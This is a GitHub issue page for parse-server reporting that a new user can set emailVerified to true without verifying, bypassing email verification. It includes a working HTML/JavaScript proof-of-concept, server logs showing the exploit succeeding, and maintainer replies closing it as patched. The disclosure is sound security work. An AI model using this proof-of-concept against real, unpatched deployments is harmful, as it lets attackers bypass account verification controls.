Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Vulnerability: Email verification can be circumvented #3393

Closed
haapaan opened this issue Jan 18, 2017 · 2 comments
Closed

Vulnerability: Email verification can be circumvented #3393

haapaan opened this issue Jan 18, 2017 · 2 comments

Comments

@haapaan
Copy link

haapaan commented Jan 18, 2017

User who has just signed up, can set emailVerified=true without actually verifying the email address. In other words, user does not have to click the link in the email to get his/her email validated.

Steps to reproduce

Steps that reproduce the issue:

  1. Set the following settings in the server.js:
    verifyUserEmails: true,
    emailVerifyTokenValidityDuration: 2 * 60 * 60,
    preventLoginWithUnverifiedEmail: true,

  2. signup, set emailVerified: true and save user. Here is sample html page that does just that:

<html>
<head>
<script type="text/javascript" src="https://npmcdn.com/parse/dist/parse.js"\>\</script>
<script type="text/javascript">
function signupAndSetEmailVerified()
{
Parse.initialize('e5c10b31d8716509af3e571260');
Parse.serverURL = 'http://127.0.0.1:8888/parse';

    var user = new Parse.User();
    user.set("username", "hacker");
    user.set("password", "passwd");
    user.set("email", "[email protected]");

    user.signUp(null, {
          success: function(user) {			  
            // Signup succeeded
            alert("Signup succeeded");				
			// Try hack emailVerified to true (should not succeed)
			user.set("emailVerified",true);
            user.save(null, {
              success : function(userAgain) {
                          // Execute any logic that should take place after the object is saved.
                          alert('Save succeeded');
                        },
              error : function(userAgain, error) {
                          alert('Save failed with '+error.message);
                      }
            });				
          },
          error: function(user, error) {
            // Show the error message somewhere and let the user try again.
            alert("Error: " + error.code + "\n\nwhat is the error \n\n " + error.message);
          }
    });   

}
</script>
</head>
<body onload="signupAndSetEmailVerified()">
</body>
</html>

Expected Results

Save should fail or at least emailVerified should still be false in the database for this user.

Actual Outcome

emailVerified is true in the database for this new user.

Environment Setup

  • Server

    • parse-server version (Be specific! Don't say 'latest'.) : 2.3.2
    • Operating System: Ubuntu 14.04.5 LTS (running on VirtualBox virtual machine)
    • Hardware: EliteBook 8470p running VirtualBox Version 5.0.30 r112061
    • Localhost or remote server? (AWS, Heroku, Azure, Digital Ocean, etc): localhost
  • Database

    • MongoDB version: v3.0.9. This issue is also reproducible with Postgresql 9.4.
    • Storage engine: default
    • Hardware: EliteBook 8470p running VirtualBox Version 5.0.30 r112061
    • Localhost or remote server? (AWS, mLab, ObjectRocket, Digital Ocean, etc): localhost

Logs/Trace

�[36mverbose�[39m: REQUEST for [POST] /parse/users: {
"username": "hacker",
"password": "",
"email": "[email protected]"
} method=POST, url=/parse/users, host=127.0.0.1:1337, user-agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0, accept=text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8, accept-language=en-US,en;q=0.5, accept-encoding=gzip, deflate, content-type=text/plain, origin=null, x-forwarded-for=10.0.2.2, x-forwarded-host=127.0.0.1:8888, x-forwarded-server=localhost, connection=Keep-Alive, content-length=214, username=hacker, password=
, email=[email protected]
�[36mverbose�[39m: RESPONSE from [POST] /parse/users: {
"status": 201,
"response": {
"objectId": "cyl7z1XcSe",
"createdAt": "2017-01-18T12:16:05.861Z",
"sessionToken": "r:c54acc4bbcf051b306c7d0f8d4982646"
},
"location": "http://127.0.0.1:8888/parse/users/cyl7z1XcSe"
} status=201, objectId=cyl7z1XcSe, createdAt=2017-01-18T12:16:05.861Z, sessionToken=r:c54acc4bbcf051b306c7d0f8d4982646, location=http://127.0.0.1:8888/parse/users/cyl7z1XcSe
�[36mverbose�[39m: REQUEST for [PUT] /parse/classes/_User/cyl7z1XcSe: {
"emailVerified": true
} method=PUT, url=/parse/classes/_User/cyl7z1XcSe, host=127.0.0.1:1337, user-agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0, accept=text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8, accept-language=en-US,en;q=0.5, accept-encoding=gzip, deflate, content-type=text/plain, origin=null, x-forwarded-for=10.0.2.2, x-forwarded-host=127.0.0.1:8888, x-forwarded-server=localhost, connection=Keep-Alive, content-length=235, emailVerified=true
�[36mverbose�[39m: RESPONSE from [PUT] /parse/classes/_User/cyl7z1XcSe: {
"response": {
"updatedAt": "2017-01-18T12:16:06.833Z"
}
} updatedAt=2017-01-18T12:16:06.833Z

@flovilmart
Copy link
Contributor

Thanks for reporting we'll have a look shortly.

@montymxb
Copy link
Contributor

Closing as patched in #3681

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

3 participants